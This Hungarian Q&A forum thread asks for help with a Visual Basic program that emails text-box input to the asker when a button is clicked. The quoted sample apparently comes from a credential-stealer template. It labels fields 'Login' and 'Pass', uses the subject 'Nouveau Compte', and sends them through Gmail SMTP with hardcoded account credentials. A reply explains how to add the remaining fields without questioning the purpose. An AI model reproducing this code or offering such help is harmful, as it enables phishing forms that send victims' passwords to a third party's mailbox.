Visual Basic 2010 Adat továbbköldő program kódjában segíteni?
Nahmost az lenne a helyzet, hogy készítettem egy programot és a segítségeteket kérném hogy a programozás részében segítsetek.
Az lenne a program lényege hogy amit a felhasználó begépel a TextBox1, TextBox2 TextBox3 TextBox4 ComboBox1 -be, azt nekem továbbítja az emailemre.
Benne kéne hogy legyen annak is a programozásban, hogy mindezt csak a Button1 megnyomása után tegye meg.
Példát találtam de azt bárhogy modositottam csak a textbox 1,2 -őt küldte el:
Imports System.Net.Mail
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim MyMailMessage As New MailMessage()
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
MyMailMessage.From = New MailAddress("pelda@gmail.com") 'Destinataire
MyMailMessage.To.Add("pelda@gmail.com") 'Expéditeur
MyMailMessage.Subject = ("[] Nouveau Compte") 'Sujet
MyMailMessage.Body = ("Login: " & TextBox1.Text & " Pass: " & TextBox2.Text) 'Corps
'SMTP
SMTPServer.Port = ("587")
SMTPServer.Credentials = New System.Net.NetworkCredential("pelda@gmail.com", "pelda") 'Email (+Pass)
SMTPServer.EnableSsl = True
Try
End Class
Előre is köszi!
> Try
Try micsoda? Itt szerintem valami lemaradt.
> bárhogy modositottam csak a textbox 1,2 -őt küldte el:
Akkor most az egyszer módosítsd úgy, hogy mindegyiket küldje el ne csak a 1,2-őt.
MyMailMessage.Body = ("Login: " & TextBox1.Text & " Pass: " & TextBox2.Text)
Ettől a sortól mégis mit vársz többet?
Segítek:
TextBox1.Text
Ez adja meg az első input mező értékét.
TextBox2.Text
Ez a másodikét.
A szövegeket az & jellel fűzöd össze.
Végül, de nem utolsó sorban, ennek a változónak kell beállítanod értékül azt, amit küldeni szeretnél:
MyMailMessage.Body
Ebből össze tudod sakkozni egy hangyányi logikával.
Kapcsolódó kérdések:
Minden jog fenntartva © 2024, www.gyakorikerdesek.hu
GYIK | Szabályzat | Jogi nyilatkozat | Adatvédelem | Cookie beállítások | WebMinute Kft. | Facebook | Kapcsolat: info(kukac)gyakorikerdesek.hu
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!